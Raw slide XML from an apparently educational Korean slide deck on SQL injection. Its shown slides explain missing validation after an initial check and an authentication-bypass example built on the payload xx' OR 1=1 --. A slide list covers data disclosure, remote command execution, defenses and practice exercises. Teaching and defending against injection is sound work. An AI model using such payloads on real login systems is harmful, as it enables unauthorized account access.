            <a:endParaRPr lang="en-US" altLang="ko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107A1-8369-4FCC-9E16-814C6DE3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2496C-BF4D-4929-8373-FF0C3214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부적절한 중복 요청 처리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개발자는 사용자가 당연히 데이터 처리 순서를 따를 것이라 생각</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>첫 부분에 검증 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이후 검증 누락</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악의적 사용자는 검증을 우회한 이후 검증이 누락된 입력에 조작을 가함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560EC-DA17-40E9-938D-24781C75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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격 유형</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인증 우회</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(Auth Bypass)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BAE27-7274-439C-8A96-D2E5E7D0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쿼리 문의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>TRUE/FALSE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>논리적 연산 오류를 이용하여 인증을 무력화 하는 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SELECT * FROM user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>WHERE id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’ AND passwd=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>입력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Passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>xx’ OR 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 입력한다면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>SELECT * FROM user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>WHERE id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’ AND passwd=‘xx’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1=1 --’</a:t>
            </a:r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PASSWD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 일치하지 않아도 뒤의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문으로 인해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/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0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와이드스크린</PresentationFormat>
  <Paragraphs>120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HY얕은샘물M</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Tw Cen MT Condensed</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>전체</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>목차</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>동작 원리</vt:lpstr>
      <vt:lpstr>동작 원리</vt:lpstr>
      <vt:lpstr>동작 원리</vt:lpstr>
      <vt:lpstr>동작 원리</vt:lpstr>
      <vt:lpstr>공격 유형_인증 우회(Auth Bypass)</vt:lpstr>
      <vt:lpstr>공격 유형_데이터 노출(Data Disclosure)</vt:lpstr>
      <vt:lpstr>Error based 예시</vt:lpstr>
      <vt:lpstr>공격 유형_데이터 노출(Data Disclosure)</vt:lpstr>
      <vt:lpstr>Union based 예시</vt:lpstr>
      <vt:lpstr>공격 유형_데이터 노출(Data Disclosure)</vt:lpstr>
      <vt:lpstr>Time based 예시</vt:lpstr>
      <vt:lpstr>공격 유형_원격 명령 실행</vt:lpstr>
      <vt:lpstr>방어법</vt:lpstr>
      <vt:lpstr>실습</vt:lpstr>
      <vt:lpstr>실습</vt:lpstr>
      <vt:lpstr>실습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Kim Tae Hwan</dc:creator>
  <cp:lastModifiedBy>Kim Tae Hwan</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-28T12:28:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-28T12:28:26Z</dcterms:modified>
</cp:coreProperties>
</file>